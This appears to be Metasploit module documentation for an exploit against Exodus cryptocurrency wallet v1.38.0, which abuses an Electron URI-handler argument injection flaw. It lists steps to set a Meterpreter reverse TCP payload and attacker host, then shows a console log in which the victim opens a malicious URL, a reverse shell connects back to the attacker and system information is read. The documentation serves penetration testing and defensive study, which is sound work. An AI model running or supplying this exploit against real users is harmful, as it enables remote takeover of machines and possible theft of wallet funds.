1.9 KiB
1.9 KiB
Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. Using the Electron remote code execution vulnerability in protocol handler is possible to inject command line arguments via URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at Exodus v1.38.0.
Verification Steps
- Install Exodus Wallet version
v1.38.0 - Start
msfconsole - Do
use exploit/windows/browser/exodus - Do
set PAYLOAD windows/meterpreter/reverse_tcp - Do
set LHOST ip - Do
exploit - On the target machine, browse to the malicious URL and launch Exodus
- Verify the Meterpreter session is opened
Scenarios
Exodus Wallet v1.38.0 on Windows 10 Enterprise x64
msf > use exploit/windows/browser/exodus
msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/browser/exodus) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Using URL: http://0.0.0.0:80/
msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
[*] Server started.
[*] 172.16.40.149 exodus - Delivering Payload
[*] Sending stage (179779 bytes) to 172.16.40.149
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000
msf exploit(windows/browser/exodus) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-PI8214R
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >